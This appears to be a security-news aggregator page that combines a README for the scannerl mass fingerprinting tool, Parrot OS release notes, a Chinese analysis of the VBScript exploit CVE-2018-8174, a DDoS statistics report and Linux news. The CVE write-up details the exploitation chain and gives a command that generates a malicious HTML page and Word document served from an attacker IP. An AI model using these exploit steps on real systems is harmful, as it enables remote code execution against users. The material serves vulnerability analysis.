fingerprinting cluster easy to set up, but it can be tweaked by adding fine-tuned scans to your fingerprinting campaigns.
It is the fastest tool to perform large scale fingerprinting campaigns.
For more:

Installation
See the different installation options under wiki installation page
To install from source, first install Erlang (at least v.18) by choosing the right packaging for your platform: Erlang downloads
Install the required packages:
# on debian
$ sudo apt install erlang erlang-src rebar

# on arch
$ sudo pacman -S erlang-nox rebar
Then build scannerl:
$ git clone https://github.com/kudelskisecurity/scannerl.git
$ cd scannerl
$ ./build.sh
Get the usage by running
$ ./scannerl -h
Scannerl is available on aur for arch linux users
DEBs (Ubuntu, Debian) are available in the releases.
RPMs (Opensuse, Centos, Redhat) are available under https://build.opensuse.org/package/show/home:chapeaurouge/scannerl.

Distributed setup
Two types of nodes are needed to perform a distributed scan:
  • Master node: this is where scannerl's binary is run
  • Slave node(s): this is where scannerl will connect to distribute all its work
The master node needs to have scannerl installed and compiled while the slave node(s) only needs Erlang to be installed. The entire setup is transparent and done automatically by the master node.
Requirements for a distributed scan:
  • All hosts have the same version of Erlang installed
  • All hosts are able to connect to each other using SSH public key
  • All hosts' names resolve (use /etc/hosts if no proper DNS is setup)
  • All hosts have the same Erlang security cookie
  • All hosts must allow connection to Erlang EPMD port (TCP/4369)
  • All hosts have the following range of ports opened: TCP/11100 to TCP/11100 + number-of-slaves

Usage
$ ./scannerl -h
____ ____ _ _ _ _ _ _____ ____ _
/ ___| / ___| / \ | \ | | \ | | ____| _ \| |
\___ \| | / _ \ | \| | \| | _| | |_) | |
___) | |___ / ___ \| |\ | |\ | |___| _ <| |___
|____/ \____/_/ \_\_| \_|_| \_|_____|_| \_\_____|

USAGE
scannerl MODULE TARGETS [NODES] [OPTIONS]

MODULE:
-m <mod> --module <mod>
mod: the fingerprinting module to use.
arguments are separated with a colon.

TARGETS:
-f <target> --target <target>
target: a list of target separated by a comma.
-F <path> --target-file <path>
path: the path of the file containing one target per line.
-d <domain> --domain <domain>
domain: a list of domains separated by a comma.
-D <path> --domain-file <path>
path: the path of the file containing one domain per line.

NODES:
-s <node> --slave <node>
node: a list of node (hostnames not IPs) separated by a comma.
-S <path> --slave-file <path>
path: the path of the file containing one node per line.
a node can also be supplied with a multiplier (<node>*<nb>).

OPTIONS:
-o <mod> --output <mod> comma separated list of output module(s) to use.
-p <port> --port <port> the port to fingerprint.
-t <sec> --timeout <sec> the fingerprinting process timeout.
-T <sec> --stimeout <sec> slave connection timeout (default: 10).
-j <nb> --max-pkt <nb> max pkt to receive (int or "infinity").
-r <nb> --retry <nb> retry counter (default: 0).
-c <cidr> --prefix <cidr> sub-divide range with prefix > cidr (default: 24).
-M <port> --message <port> port to listen for message (default: 57005).
-P <nb> --process <nb> max simultaneous process per node (default: 28232).
-Q <nb> --queue <nb> max nb unprocessed results in queue (default: infinity).
-C <path> --config <path> read arguments from file, one per line.
-O <mode> --outmode <mode> 0: on Master, 1: on slave, >1: on broker (default: 0).
-v <val> --verbose <val> be verbose (0 <= int <= 255).
-K <opt> --socket <opt> comma separated socket option (key[:value]).
-l --list-modules list available fp/out modules.
-V --list-debug list available debug options.
-A --print-args Output the args record.
-X --priv-ports use only source port between 1 and 1024.
-N --nosafe keep going even if some slaves fail to start.
-w --www DNS will try for www.<domain>.
-b --progress show progress.
-x --dryrun dry run.
See the wiki for more.

Standalone usage
Scannerl can be used on the local host without any other host. However, it will still create a slave node on the same host it is run from. Therefore, the requirements described in Distributed setup must also be met.
A quick way to do this is to make sure your host is able to resolve itself with
grep -q "127.0.1.1\s*`hostname`" /etc/hosts || echo "127.0.1.1 `hostname`" | sudo tee -a /etc/hosts
and create an SSH key (if not yet present) and add it to the authorized_keys (you need an SSH server running):
cat $HOME/.ssh/id_rsa.pub >> $HOME/.ssh/authorized_keys
The following example runs an HTTP banner grabing on google.com from localhost
./scannerl -m httpbg -d google.com

Distributed usage
In order to perform a distributed scan, one need to pre-setup the hosts that will be used by scannerl to distribute the work. See Distributed setup for more information.
Scannerl expects a list of slaves to use (provided by the -s or -S switches).
./scannerl -m httpbg -d google.com -s host1,host2,host3

List available modules
Scannerl will list the available modules (output modules as well as fingerprinting modules) with the -l switch:
$ ./scannerl -l

Fingerprinting modules available
================================

bacnet UDP/47808: Bacnet identification
chargen UDP/19: Chargen amplification factor identification
fox TCP/1911: FOX identification
httpbg TCP/80: HTTP Server header identification
- Arg1: [true|false] follow redirection [Default:false]
httpsbg SSL/443: HTTPS Server header identification
https_certif SSL/443: HTTPS certificate graber
imap_certif TCP/143: IMAP STARTTLS certificate graber
modbus TCP/502: Modbus identification
mqtt TCP/1883: MQTT identification
mqtts TCP/8883: MQTT over SSL identification
mysql_greeting TCP/3306: Mysql version identification
pop3_certif TCP/110: POP3 STARTTLS certificate graber
smtp_certif TCP/25: SMTP STARTTLS certificate graber
ssh_host_key TCP/22: SSH host key graber

Output modules available
========================

csv output to csv
- Arg1: [true|false] save everything [Default:true]
csvfile output to csv file
- Arg1: [true|false] save everything [Default:false]
- Arg2: File path
file output to file
- Arg1: File path
file_ip output to stdout (only ip)
- Arg1: File path
file_mini output to file (only ip and result)
- Arg1: File path
file_resultonly output to file (only result)
- Arg1: File path
stdout output to stdout
stdout_ip output to stdout (only IP)
stdout_mini output to stdout (only ip and result)

Modules arguments
Arguments can be provided to modules with a colon. For example for the file output module:
./scannerl -m httpbg -d google.com -o file:/tmp/result

Result format
The result returned by scannerl to the output modules has the following form:
{module, target, port, result}
Where
  • module: the module used (Erlang atom)
  • target: IP or hostname (string or IPv4 address)
  • port: the port (integer)
  • result: see below
The result part is of the form:
{{status, type},Value}
Where {status, type} is one of the following tuples:
  • {ok, result}: fingerprinting the target succeeded
  • {error, up}: fingerprinting didn't succeed but the target responded
  • {error, unknown}: fingerprinting failed
Value is the returned value - it is either an atom or a list of element

Extending Scannerl
Scannerl has been designed and implemented with modularity in mind. It is easy to add new modules to it:
  • Fingerprinting module: to query a specific protocol or service. As an example, the fp_httpbg.erl module allows to retrieve the server entry in the HTTP response.
  • Output module: to output to a specific database/filesystem or output the result in a specific format. For example, the out_file.erl and out_stdout.erl modules allow respectively to output to a file or to stdout (default behavior if not specified).
To create new modules, simply follow the behavior (fp_module.erl for fingerprinting modules and out_behavior.erl for output module) and implement your modules.
New modules can either be added at compile time or dynamically as an external file.
See the wiki page for more.


Download Scannerl

          Parrot Security 4.3 - Security GNU/Linux Distribution Designed with Cloud Pentesting and IoT Security in Mind      Cache   Translate Page      


Parrot 4.3 is now available for download. This release provides security and stability updates and is the starting point for the plan to develop an LTS edition of Parrot.

Linux 4.18

Linux was updated to the 4.18.10 version, and linux 4.19 will be released soon.

Firefox 63

Firefox 63 provides noticeable security and privacy features, but it is no longer available to 32bit systems, so has been switched to firefox-esr on all the unsupported architectures.

Wine menu


Has been fixed a bug in the parrot menu configuration that prevented several menu categories to show up.
This fixed the missing wine menu bug, which is now back again.


Bashrc updates

The Parrot .bashrc file was updated, now it provides better snap support, the ll alias now shows the size in a human readable format and it does no longer overwrite some global settings as it used to do before.

Java 11

OpenJDK 11 is now the default java provider.

Anonsurf

Anonsurf received important stability upgrades and now it does not mess up the DNS configuration.

New Parrot icons


The Parrot edition of the MAIA icon theme was updated.
Has been dropped many old unused icons and replaced them with newer ones.


Core updates


Parrot 4.3 provides the latest updates of Debian Testing and many improvements to our sandbox system, in fact, both firejail and apparmor received significant updates, and now the whole system is smoother, more secure and more reliable.


Download Parrot Security 4.3

          Windows VBScript引擎远程执行代码漏洞 CVE-2018-8174分析与利用      Cache   Translate Page      
漏洞简介 VBScript引擎处理内存中对象的方式中存在一个远程执行代码漏洞。该漏洞可能以一种攻击者可以在当前用户的上下文中执行任意代码的方式来破坏内存。成功利用此漏洞的攻击者可以获得与当前用户相同的用户权限。如果当前用户使用管理用户权限登录,则成功利用此漏洞的攻击者可以控制受影响的系统。然后攻击者可以安装程序; 查看,更改或删除数据; 或创建具有完全用户权限的新帐户。 在基于Web的攻击情形中,攻击者能通过Internet Explorer利用此漏洞的特定网站,然后诱使用户查看该网站。攻击者还可以在承载IE呈现引擎的应用程序或Microsoft Office文档中嵌入标记为“安全初始化”的ActiveX控件。攻击者还可以利用受到破坏的网站和接受或托管用户提供的内容或广告的网站。这些网站可能包含可能利用此漏洞的特制内容。 2018年5月8日,微软发布了安全补丁,影响流行的大部分系统版本。 漏洞基本信息 漏洞ID CVE-2018-8174 漏洞名称 Microsoft VBScript引擎远程执行代码漏洞 漏洞类型 远程代码执行 威胁类型 UAF 影响系统版本 Windows 7 x86和x64版本、RT8.1、Server2008及R2/2012及R2/2016、8.1、10及服务器等版本 漏洞测试 系统环境 Win7 32 IE IE8 EXP https://www.exploit-db.com/exploits/44741/ 漏洞原理 由于样本混淆严重,部分代码见图1,这里采用简化POC进行分析,代码见图2。  图1 样本采用了严重混淆  图2 Crash Poc Crash Poc中定义两个数组array_a和array_b,并声明了一个类MyTest,且重载了析构函数Class_Terminate,UAF中创建MyTest的实例赋值给数组array_a(1),并通过Erase array_a清空array_a中的元素,在析构array_a中的元素的时候会触发脚本中Class_Terminate的调用,在Class_Terminate中增加了一个array_b(0)对MyTest实例的引用(MyTest实例引用计数+1),再通过array_a (1)= 1删除array_a (1) 对MyTest实例的引用(MyTest实例引用计数-1)来平衡引用计数,这时候MyTest实例会被释放,但是array_b(0)仍然保留了这个MyTest实例的引用,从而array_b(0)指向了被释放的MyTest实例的内存,最终在MyTestVuln中通过b(0) = 0访问未分配内存触发漏洞。 当我们启用了页堆的IE浏览器运行这个PoC时,我们可以观察到OLEAUT32!VariantClear函数会发生崩溃:调用被释放的内存时出现访问冲突(Access Violation)异常。 从堆信息中可以看到eax(0x14032fd0)在vbscript!VbsErase的调用栈中被释放了,vbscript!VbsErase即对应了脚本中的Erase,而eax正是被VBScriptClass::Release函数释放的VBScriptClass对象也就是脚本中的MyTest实例。VBScriptClass::Release的逻辑如下图:     VBScriptClass::Release中首先对VBScriptClass的引用计数-1(&VBScriptClass+0×4),如果引用计数=0则调用VBScriptClass::TerminateClass,调用VBScriptClass::TerminateClass时因为在脚本中重载了Class_Terminate函数,所以获得了一次脚本执行的机会,这里就可以在释放VBScriptClass的内存前将即将释放的VBScriptClass内存地址保存脚本控制的变量中(Set array_b(0)=array_a(1)),并通过array_a (1) = 1平衡引用计数,最终释放内存。 Set array_a(1) = New MyTest时,VBScriptClass引用计数为2。 Erase array_a 返回后,MyTest指向的内存已释放,但array_b(0)仍指向这块被释放的内存,形成了悬挂指针,见下图: 漏洞利用分析 UAF漏洞利用的关键是如何用这个悬挂指针来操作内存。该漏洞利用多次UAF来完成类型混淆,通过伪造精数组对象完成任意地址读写,最终通过构造对象后释放来获取代码执行,代码执行没有使用传统的ROP技术或GodMod技术,而是通过脚本布局Shellcode利用。 伪造数组达到任意写目的 通过UAF制造2个类的mem成员指向的偏移相差0x0c字节,通过对2个对象mem成员读的写操作伪造一个0x7fffffff大小的数组。 伪造的数组大致情况是:一维数组,元素有7fffffff个,每个元素占用1字节,元素内存地址为0。所以该数组可访问的内存空间为0×00000000到0x7ffffffff*1。因此通过该数组可以任意地址读写。但是在lIlIIl在存放的时候,存放的类型是string类型,故只需要将该数据类型将会被修改为0x200C,即VT_VARIANT|VT_ARRAY,数组类型,即可达到目的。 攻击代码中,主要使用上面的函数来读取参数所指定的内存地址的数据。利用思路是在VBS中数据类型为bstr类型,通过vb中lenb(bstrxx)返回字符串地址前4个字节的内容(即bstr类型size域内容)的特性,获取指定内存读能力。 如上述代码所示,假如传进来的参数为addr(0×11223344),首先该数值加4,为0×11223348,然后设置variant类型为8(string类型)。然后调用len函数,发现是BSTR类型,vbscript会认为其向前4字节即0×11223344就是存放长度的地址内存。因此执行len函数,实际上就返回了制定参数内存地址的值。 通过DOSmodeSearch获取。 通过泄露CScriptEntryPoint对象的虚函数表地址,该地址属于Vbscript.dll。 由于vbscript.dll导入了msvcrt.dll,因此通过遍历vbscript.dll导入表获取msvcrt.dll基地址, msvcrt.dll又引入了kernelbase.dll、ntdll.dll,最后可以获取NtContinue、VirtualProtect函数地址。 绕过DEP执行shellcode a.利用任意读写的手段修改某个VAR的type类型为0x4d,再赋值为0让虚拟机执行VAR::Clear函数,如下图显示。 b.通过精心控制使代码执行ntdll!ZwContinue函数,第一次参数CONTEXT结构体也是攻击者精心构造的,见下图。 c.ZwContinue的第一个参数是指向CONTEXT结构体的指针,可计算出EIP和ESP在CONTEXT中的偏移。 d.实际运行时CONTEXT中的Eip和Esp的值以及攻击者的方法,见下图。  攻击者将CONTEXT中的EIP设置为VirutalProtect,将ESP中的返回地址和VirtualProtect的第一个参数,都设置为shellcode的起始地址。当ZwContinue执行后直接跳到VirtualProtect第一条指令开始执行。  根据攻击者构造的参数将shellcode所在内存设置为可执行状态,当VirtualProtect返回时就会跳到shellcode执行。 最后调用WinExec弹出计算器。 MSF利用 环境准备 目标机 Win7以及安装具有该漏洞的office 攻击机 Kali  linux Msf组件 https://github.com/Sch01ar/CVE-2018-8174_EXP 生成带有恶意 VBscript 的html 页面和 word 文档 python CVE-2018-8174.py -uhttp://192.168.106.139/exploit.html […]
          卡巴斯基2018 Q3全球DDoS攻击分析报告      Cache   Translate Page      
在DDoS攻击方面,2018年第三季度相对平静。所谓“相对”,是因为主要资源上没有出现很多高级别或者连续多日的DDoS攻击。然而,犯罪分子攻击能力日趋增强,而攻击的总数却丝毫没有显示出下降的迹象。 7月初对“暴雪娱乐”的攻击成为今年夏天的头条新闻。Battle.net服务器被脱机发送控制,近三天时间内,玩家不能登录启动游戏。一个名为PoodleCorp的组织声称对此负责,该团体曾经在Twitter上露面。声称如果他们的消息被转发2000次以上,他们承诺将离开公司。不久之后,“暴雪娱乐”发布报告说“已经解决了玩家遇到不能登录的技术问题。” 在7月底之前,又发生了一系列针对另一家游戏发行商Ubisoft的攻击。结果,玩家无法登录他们的帐户,不能开启多人游戏模式。据该公司发言人称,用户数据没有受到损害。没有关于行动目的的报告。攻击者可能已经考虑到财务收益,或者只是针对最近游戏进行的一些更新提出抗议。 另外一个重大且持续数天的攻击,英语区的三大扑克类游戏网站:America’s Card Room,PokerStars和Partypoker非常恼火。受害的经营者被迫取消他们的一些活动,引起了网站成员的不满,因此他们失去了大笔资金。 与往常一样,DDoS攻击几乎可以肯定是由政治紧张造成的。8月底,瑞典社会民主党网站长达六分钟的中断,就是这种攻击的一个鲜明例子。同样,政治原因也被认为导致了加利福尼亚民主党国会候选人网站攻击。一个月之后,“政治”的标签也可能受到激进分子的推动,助长了对德国RWE的攻击:通过点击他们的网站,活动人士试图引起公众注意。 无论如何,一般公众仍然对导致南非共和国劳动部遭受痛苦的原因感到茫然(对其网络资源的攻击发生在9月初,据该部发言人称,没有内部系统或数据受到损害)。关于荷兰政府服务DigiD袭击事件背后的动机存在同样的不确定性:7月底,它在一周内遭到三次袭击,使许多公民无法获得与税收相关的其他功能。同样,没有报告表明数据存在泄漏。 DDoS攻击者的工具集没有太多更新;虽然一些好奇的新技术和一些新的漏洞确实在专家的视线范围内。因此,在7月20日,他们发现了针对D-Link路由器的大规模“招募活动”,该路由器使用了超过3,000个IP和一个命令服务器。该漏洞利用在企业环境中并不十分成功;还有待观察它是否能够创建一个新的用户路由器僵尸网络(以及它有多大)。 谈到特洛伊木马,报道于7月底开始传播有关新设计的特洛伊木马死亡案例,该案件通过招募监控摄像机来构建僵尸网络。臭名昭着的黑客Elit1Lands使用这个恶意软件AVTech漏洞,于2016年10月公开。安全研究员Ankit Anubhav设法联系网络犯罪分子并了解到目前为止僵尸网络尚未用于大规模DDoS攻击。 此外,在8月底和9月初,安全专家首先看到了新版本的Mirai和Gafgyt僵尸网络,利用了SonicWall和Apache Struts中的漏洞(在最后一种情况下,与信用参考中的大量数据泄露相关的错误相同)局Equifax)。 与此同时,Mirai的原始版本的三位作者,他们已经公开发布,最终被判刑。阿拉斯加联邦法院命令Paras Jha,Josiah White和Dalton Norman支付大量的补偿金,并提供2,500小时的社区服务。从表面上看,他们将代表FBI工作,而这句话的实际温和性是由于在这个过程中三名受试者与联邦调查人员正式合作:根据法庭文件,这三名男子已经积累通过将他们的专业知识用于至少十几项调查,提供超过1,000小时的社区服务。 此外,英国警方逮捕了我们上次报告中提到的针对ProtonMail的DDoS攻击背后的一名入侵者。这位19岁的新秀黑客成了英国公民,也参与了对学校,学院和航空公司制造恶作剧炸弹的威胁。他的父母坚持认为,通过玩“我的世界”游戏,他在网上被“认真的人”“整理”了。这个故事很难以年轻神童的工作结束,尽管他确实面临可能引渡到美国:根据调查,他的曝光主要是因为他没有实践非常好的操作安全。 季度趋势 与去年第三季度相比,由于9月份,DDoS攻击次数略有增加,而在夏季和全年,DDoS攻击次数明显减少。 2017 – 2018年卡巴斯基DDoS保护失败的季度DDoS攻击次数(2017年攻击次数为100%) 上图显示,与去年相比略有增加归因于9月,占所有攻击的最大份额(约为2017年的5倍)。相反,7月和8月与去年相比变得更安静了。2017年,没有观察到这种不成比例。 卡巴斯基DDoS保护在9月遭到DDoS攻击,与2017年和2018年的Q3总量成比例 DDoS恰好在9月份出现了一个相当普遍的事情:年复一年的主要目标是教育系统,针对学校,大学和测试中心的网络资源进行攻击。英国一所顶尖学校 - 爱丁堡大学于9月12日开始并持续近24小时的攻击,成为今年最大的头条新闻。 根据统计数据,这种情况往往归咎于国家的敌人,但这些指控是没有根据的。因此,在我们的私人调查过程中,我们发现攻击主要发生在大学生在学时间,并在休假期间消退。英国非营利组织Jisc得到了几乎相同的结果:通过收集有关大学攻击的统计数据,它了解到学生在度假时受到的攻击较少。每日课外时间也是如此:主要的DDoS干扰是学校在上午9:00到下午4:00期间经历的。 当然,这可能表明肇事者只是将他们的行为与大学的作息时间同步……但解释越简单,就越有可能:这些攻击也很可能是由年轻人设计的,可能有一些“好”的理由来惹恼他们的老师,其他学生或一般学校。与此假设一致,我们的专家能够在社交网络中找到DDoS攻击准备的痕迹;虽然我们来自英国的同事遇到了一个相当有趣的案例:一名针对宿舍服务器的攻击由一名学生发起,企图打败他的网络游戏对手。 从各方面来看,这些周期性的爆发将在未来再次发生 - 要么所有的教育机构都要坚持不懈的防御,要么直到所有的学生和他们的老师都对DDoS攻击及其后果有了全新的认识。然而,应该提到的是,虽然大多数攻击是由学生组织的,但并不意味着没有任何“严重”攻击。 例如,在9月份发起的针对美国供应商Infinite Campus 的DDoS活动,为其所在地区的许多学校提供家长门户服务,是如此强大和旷日持久以至于引起美国国土安全部的注意。学龄儿童的努力难以解释。 无论如何,虽然9月份好转的原因很可能与新学年的到来有关,但解释经济衰退有点困难。我们的专家认为,大多数僵尸网络所有者已经将其能力重新配置为更有利可图且相对更安全的收入来源:加密货币挖掘。 DDoS攻击最近便宜了很多,但仅限于客户。至于组织者,他们的成本仍然很高。至少,必须购买处理能力(有时甚至装备数据中心),编写自己的木马或修改现有木马(例如流行的Mirai),使用木马来组装僵尸网络,找到一个客户,发动攻击等等。更不用说这些东西都是非法的。执法部门可以采取一切措施:Webstresser.org的垮台随后是一系列逮捕行为就是一个很好的例子。 另一方面,加密货币挖掘现在几乎是合法的:唯一的非法方面是使用别人的硬件。在某些安排到位的情况下,采矿系统上的采矿过于明显对其所有者来说很明显,没有太多机会不得不处理网络警察。网络犯罪分子还可以重新利用他们已经拥有的硬件用于挖掘,从而完全逃脱了执法部门的注意力。例如,最近有关于新僵尸网络的报道MikroTik路由器,最初是作为加密货币挖掘工具创建的。还有间接证据表明,许多具有当之无愧声誉的僵尸网络的所有者现在已将其重新配置为采矿。因此,成功的僵尸网络yoyo的DDoS活动已经下降得非常低,尽管没有关于它被拆除的信息。 逻辑中有一个公式,其中包含:相关性并不意味着因果关系。换句话说,如果两个变量以类似的方式变化,则这些变化不一定有任何共同之处。因此,尽管将加密货币开采的增长与今年DDoS攻击的松弛联系起来似乎是合乎逻辑的,但这并不能说是最终的事实。而是一个有效的假设。 卡巴斯基实验室在打击网络威胁方面有着悠久的历史,包括各种类型和复杂性的DDoS攻击。该公司的专家使用卡巴斯基DDoS智能系统监控僵尸网络。 作为卡巴斯基DDoS保护的一部分,DDoS智能系统拦截并分析机器人从其管理和控制服务器接收的命令。要启动保护,不必等到用户设备被感染或直到攻击者的命令被执行。 此报告包含2018年第3季度的DDoS Intelligence统计信息。 就本报告而言,单独的(一个)DDoS攻击是指僵尸网络繁忙时段之间的间隔不超过24小时。例如,如果相同的资源在24小时或更长时间的暂停后第二次被同一僵尸网络攻击,则会记录两次攻击。如果属于不同僵尸网络的僵尸程序查询相同的资源,则攻击也被视为单独的。 DDoS攻击和命令服务器的受害者的地理位置根据其IP进行注册。该报告按季度统计中的唯一IP地址数计算唯一DDoS目标的数量。 DDoS Intelligence统计数据仅限于卡巴斯基实验室迄今为止检测和分析的僵尸网络。还应该记住,僵尸网络只是用于DDoS攻击的工具之一,本节并未涵盖给定时期内每一次DDoS攻击。 季度总结 和以前一样,中国在攻击次数最多的地方(78%)名列前茅,美国已经重新获得第二名(12.57%),澳大利亚排名第三(2.27%) - 比以往任何时候都高。虽然进入门槛低得多,但韩国有史以来第一次进入前10名。 在独特目标的分布方面也出现了类似的趋势:韩国已经跌至评级列表的最底层;澳大利亚已攀升至第三位。 在数量方面,使用僵尸网络实现的DDoS攻击在8月份达到了主要的高峰;7月初观察到最安静的一天。 持续攻击的数量有所下降;然而,持续时间不足4小时的短期增长17.5 pp(至86.94%)。独特目标的数量增加了63%。 Linux僵尸网络的份额仅比上一季度略有增长。在这种情况下,DDoS攻击的类型分布没有太大变化:SYN洪水仍然排在第一位(83.2%)。 在过去的一个季度中,托管命令服务器数量最多的国家/地区列表发生了巨大变化。像希腊和加拿大这样的国家,以前已进入前十名,现在已经排在榜单的前列。 攻击地理 中国仍然占据上限,其份额从59.03%飙升至77.67%。美国重新获得第二个位置,尽管它已经增长了0.11个百分点,达到12.57%。这就是惊喜的开始。 首先,自监测开始以来,韩国首次跌出前十名:其份额从上季度的3.21%下降至0.30%,从第四位到第十一位下坡。与此同时,澳大利亚从第六位攀升至第三位:现在它占传出DDoS攻击总数的2.27%。这表明过去几个季度出现的非洲大陆的增长趋势仍然存在。香港从第二位升至第四位:其份额从17.13%下降至1.72%。 除了韩国,马来西亚也排名前十;这两个被新加坡(0.44%)和俄罗斯(0.37%)分别取代 - 分别排名第七和第十位。他们的股价从第二季度开始增长很少,但由于中国的飞跃,准入门槛变得不那么苛刻了。法国的例子证明了这一点:第二季度法国排名第十,占DDoS攻击总数的0.43%;本季度其份额降至0.39%,但该国仍然排名第八。 同样,来自前10名以外的所有国家的综合百分比从3.56%下降到2.83%。 各国的DDoS攻击,2018年第2季度和第3季度  在各国的独特目标评级中也发生了类似的过程:中国的份额增长了18个百分点,达到70.58%。目标数量的前五个位置看起来与攻击次数基本相同,但排名前十的位置有点不同:韩国仍然存在,尽管它的份额大幅减少(从下降到0.39%) 4.76%)。此外,评级表失去了马来西亚和越南,取而代之的是俄罗斯(0.46%,第八名)和德国(0.38%,第十名)。 按国家,2018年第二季度和第三季度的独特DDoS目标 动态DDoS攻击次数 第三季度的开始和结束并没有充分的攻击,但是8月和9月初的特征是锯齿状的图形,有很多山峰和山谷。最大的峰值发生在8月7日和20日,间接与大学收集申请人的论文并公布录取分数的日期相关。7月2日结果最安静。尽管不是很忙,但本季度末的攻击仍然比开始时更多。 2018年第三季度DDoS攻击数量动态  本季度的分配日相当均匀。星期六现在是本周最“危险”的一天(15.58%),从周二(13.70%)夺走了手掌。星期二在攻击次数方面倒数第二,仅在星期三之前,目前是本周最安静的一天(12.23%)。 按星期几,二季度和2018年第三季度进行DDoS攻击 DDoS攻击的持续时间和类型 第三季度最长的袭击持续了239个小时 - 短短10天。只是提醒你,上一季度最长的一个开启了将近11天(258小时)。 大规模,长期攻击的比例大幅下降。这不仅适用于持续时间超过140小时的“冠军”,也适用于所有其他类别长达5小时的冠军。最显着的下降发生在持续5到9小时的类别中:这些攻击从14.01%下降到5.49%。 然而,不到4个小时的短暂攻击增长了近17.5个百分点,达到86.94%。与此同时,目标数量比上一季度增长了63%。 按持续时间,小时,Q2和Q3 2018进行DDoS攻击 按攻击类型分布的数据几乎与上一季度相同。SYN Flood一直保持着第一的位置;其份额增长甚至达到83.2%(第二季度为80.2%,第一季度为57.3%)。UDP流量排在第二位;它也小幅上涨至11.9%(上一季度为10.6%)。其他类型的攻击损失了几个百分点但在相对发生率方面没有变化:HTTP仍然是第三,而TCP和ICMP分别是第四和第五。 按类型,Q2和Q3 2018进行DDoS攻击 (下载) Windows和Linux僵尸网络的比例与上一季度的比例大致相同:Windows僵尸网络已经上升(并且Linux下降了1.4个百分点)这与攻击类型变化动态相关。 Windows vs. Linux僵尸网络,2018年第3季度  僵尸网络分布地理 在僵尸网络命令服务器数量最多的十大区域列表中出现了一些重组。美国保持第一,但其份额从上季度的44.75%下降至37.31%。俄罗斯的市场份额从2.76%上升至8.96%,上升至第二位。希腊名列第三:它占指挥服务器的8.21% - 从0.55%上升到上一季度前十名之外。 中国仅有5.22%,仅为第五,被加拿大击败,得分为6.72%(比第二季度的数字高出数倍)。 与此同时,前十名以外国家的合计份额大幅增加:增长近5个百分点,目前为16.42%。 Botnets按国家/地区命令服务器,2018年第3季度 (下载) 结论 过去三个月没有发生过重大的高调袭击事件。与夏季放缓相反,9月份对学校的袭击事件特别明显。它已经成为卡巴斯基实验室多年来观察到的循环趋势的一部分。 另一个显着的发展是长期攻击数量的减少以及越来越多的独特目标:僵尸网络所有者可能正在用小型攻击取代大规模攻击(有时在英语媒体中被称为“爬行”攻击),通常无法区分“网络噪音”。我们已经看到过去几个季度这种范式变化的前奏。 就C&C僵尸网络数量而言,前十大阵容正在连续第二季度突然重组。可能是攻击者试图扩展到新的地区或试图安排其资源的地理冗余。原因可能是经济(电价,暴露于不可预见的情况下的业务稳健性)和合法的反网络犯罪行为。 过去两个季度的统计数据使我们相信DDoS社区目前正在展开某些转型过程,这可能会在不久的将来严重重新配置这一领域的网络犯罪活动。 *本文作者:bingbingxiaohu,转载请注明来自FreeBuf.COM
          Enterprise Linux 7.6 Red Hat disponible      Cache   Translate Page      

          Attempting to upload a file onto a datastore with vSphere Client 6.5 fails with: "The operation failed."      Cache   Translate Page      

Problem

You attempt to upload a file onto a datastore in a vSphere 6.5 environment with the vSphere Client but notice that it fails with the error message:

image

Clicking onto the Details… link beside The operation failed. reveals the following message:

The operation failed

The operation failed for an undetermined reason. Typically this problem occurs due to certificates that the browser does not trust. If you are using self-signed or custom certificates, open the URL below in a new browser tab and accept the certificate, then retry the operation. https://esxi07.domain.com If this does not resolve the problem, other possible solutions are shown in this KB article: http://kb.vmware.com/kb/2147256

image

You proceed to view the certificate with the browser and install it into the Local Computer Trusted Root Certification Authorities but the upload continues to fail:

imageimage

Solution

Other than issuing a certificate from a trusted authority such as an Enterprise CA or public CA, you can quickly get around this by browsing to the webpage of the vCenter and download the self-signed certificate via the Download trusted root CA certificates link at the bottom right corner:

image

The download.zip file will contain a certs folder with a subfolders representing different operating systems such as Linux, Mac and Windows.  Open the appropriate operating system folder:

image

Then proceed to install the root certificate onto the desktop launching the vSphere Client:

imageimageimage

image

image

imageimage

imageimageimageimage

image

Browsing back to the vCenter’s root website should no longer present a certificate warning:

image

… and datastore uploads should now work.


          today's leftovers      Cache   Translate Page      
  • QEMU 3.1 Begins Its Release Dance With 3.1.0-RC0

    The initial release candidate of the upcoming QEMU 3.1 is now available for this important piece of the open-source Linux virtualization stack.

  • Planet KDE Twitter Feed

    Some years ago I added an embedded Twitter feed to the side of Planet KDE.  This replaced the earlier feed manually curated feeds from identi.ca and twitter which people added but had since died out (in the case of identi.ca) and been blocked (in the case of Twitter).  That embedded Twitter feed used the #KDE tag and while there was the odd off topic or abusive post for the most part it was an interesting way to browse what the people of the internet were saying about us.  However Twitter shut that off a few months ago which you could well argue is what happens with closed proprietary services.

    We do now have a Mastodon account but my limited knowledge and web searching on the subject doesn’t give a way to embed a hashtag feed and the critical mass doesn’t seem to be there yet, and maybe it never will due to the federated-with-permissions model just creating more silos.

  • VyOS 1.2.0-rc6 is available for download

    As usual, every week we make a new release candidate so that people interested in testing can test the changes quickly and people who reported bugs can confirm they are resolved or report further issues.

  • SUSECON Global Open Source Conference Opens Registrations
  • Marvell, TUXEDO Computers Sponsor openSUSE Project

    Two companies were recently added to the openSUSE Sponsors page thanks to the companies generous donations to the openSUSE Project.

    Both Marvell and TUXEDO Computers have provided tangible support through donations to openSUSE to promote the use and development of Linux.

    “We are thoroughly pleased to have Marvell and TUXEDO Computers as sponsors of the openSUSE Project,” said Richard Brown, chairman of the openSUSE Board. “The sponsorships support and encourage open-software development. Multiple Linux distributions and the open-source community will benefit greatly from the equipment.”

  • TeX Live/Debian updates 20181106 00:51

    All around updates in the TeX Live on Debian world: Besides the usual shipment of macro and font packages, we have uploaded a new set of binaries checked out from current svn, as well as the latest and shiniest version of biber to complement the macro update of biblatex.

  • Kai-Chung Yan: My Open-Source Activities from September to October 2018
  •  

  • Intel 6th and 7th Gen box PCs offer PCIe graphics expansion

    Aaeon launched a rugged, Linux-friendly line of “Boxer-6841M” industrial computers based on 6th or 7th Gen Core CPUs with either a PCIe x16 slot for Nvidia GPU cards or 2x PCIe x8 slots for frame grabbers.

    The Boxer-6841M line of six industrial box PCs is designed for edge AI and machine vision applications. Like last year’s Boxer-6839, the rugged, wall-mountable computers run Linux (Ubuntu 16.04) or Windows on Intel’s 6th Generation “Skylake” and 7th Generation “Kaby Lake” Core and Xeon processors with 35W to 73W TDPs. The systems use T and TE branded Core CPUs and Intel H110 PCH or C236 PCH chipsets.

read more


          EEE, Openwashing and Surveillance as Linux Foundation 'Thing'      Cache   Translate Page      

read more


